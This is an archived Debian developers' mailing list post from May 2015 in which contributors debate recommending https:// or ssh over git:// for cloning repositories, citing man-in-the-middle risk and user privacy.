On 27 May 2015 at 23:00, <j...@joshtriplett.org> wrote: > On Wed, May 27, 2015 at 10:44:17PM +0100, Dimitri John Ledkov wrote: >> On 27 May 2015 at 09:08, Wouter Verhelst <wou...@debian.org> wrote: >> > On Mon, May 25, 2015 at 11:38:06AM -0700, Josh Triplett wrote: >> >> > While we're on the subject of git security...should we stop >> >> > recommending that non-account-holders use git:// (most efficient, but >> >> > insecure against MITM unless you manually check the commit number) in >> >> > preference to https:// (at least some security)? >> >> > https://wiki.debian.org/Alioth/Git#Accessing_repositories >> >> >> >> https:// is actually just as efficient as git:// these days (other than >> >> the >> >> minor overhead of TLS, which is worth it for security). >> > >> > Why? Which attack do you envision (other than the ridiculous "the NSA >> > would see >> > that we're pushing!", which they can by just doing a git clone too) that >> > would >> > be thwarted by https but not by signed commits? >> > >> >> It fails The Dissident Test, hence we should use https or ssh for >> cloning. And provide only those methods. >> >> Overall we should default to protect the privacy of DDs, contributors >> and our users. I was pondering for some time if we should add that to >> DFSG or maybe have a GR about it. > > The security of a program is orthogonal to its licensing; let's not mix > the two. I agree that we should push for TLS, but that's not a DFSG > matter.
Dunno, it's blurry to me. Shall we remove telnet?! Shall we not?! Server / client / both?! A lot of times I view lack of privacy as RC-buggy. Anyway, we are digressing. -- Regards, Dimitri. -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/canbhlujh7jv549srljexzcyik4rsy1shcmzlh6exp2p3owd...@mail.gmail.com
